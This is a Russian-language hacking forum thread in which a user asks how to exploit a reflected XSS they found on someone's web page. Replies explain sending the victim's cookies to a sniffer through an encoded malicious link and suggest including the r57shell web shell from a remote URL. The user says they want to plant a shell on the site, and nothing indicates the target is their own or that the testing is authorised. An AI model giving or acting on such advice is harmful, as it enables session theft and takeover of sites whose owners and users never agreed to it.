что можно выжать из пасивной XSS
 

Вот нашёл страничку где я могу писать что хочу в адресной строке и это выводится на странице. Подскажите чтоб такого я мог бы сделать?

Cкрин

Думаю фильтра на знаки там нет

А скрипты работают? Вмысле <script>alert()</script> работает?

Да, работают

Ещё скрин

ДА че нам до твоих скринов...

А там авторизация по кукам есть?

пассивная хсс...если там авторизация есть, максимум что сможешь, это: подставишь в урл скрипт, отсылающий куки на снифер, закодируешь урл, дашь жертве урл, чтоб он зашел по этой ссылке...куки будут на снифере.

А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?

там он фрейм вставляет ;)

Ты сперва КСС от ИНКЛУДА резлечи хоть.

авторизация есть, но у меня уже есть username:password

я просто в пхп нифига не понимаю
если есть было бы хорошо визуальный шелл туда загрузить

точней кое что понимаю т.к. знаю asp

Ты сночала подумай точно это инклуд!

Инклуд это не <Iframe src=[shell]>


От Модера:
рЫклама запрещается, причем там надо зарегистрироваться.Лучше ,ы скопировал сюда, а внизу поставил бы (це) нетсек поверед бай машка
=)

я сходил по этой ссылке: PHP-including

и попробовал, только у меня не получается ковычки вставить для include src
если я ковычки печатаю то всё что находится между ними появляется на странице даже если использую ` или '
получается только если я вставляю какой нибудь таг в ковычкaх, к примеру здесь первое слово не появляется, а второе появляется

<? echo "Whatever <br> Whenever" ?>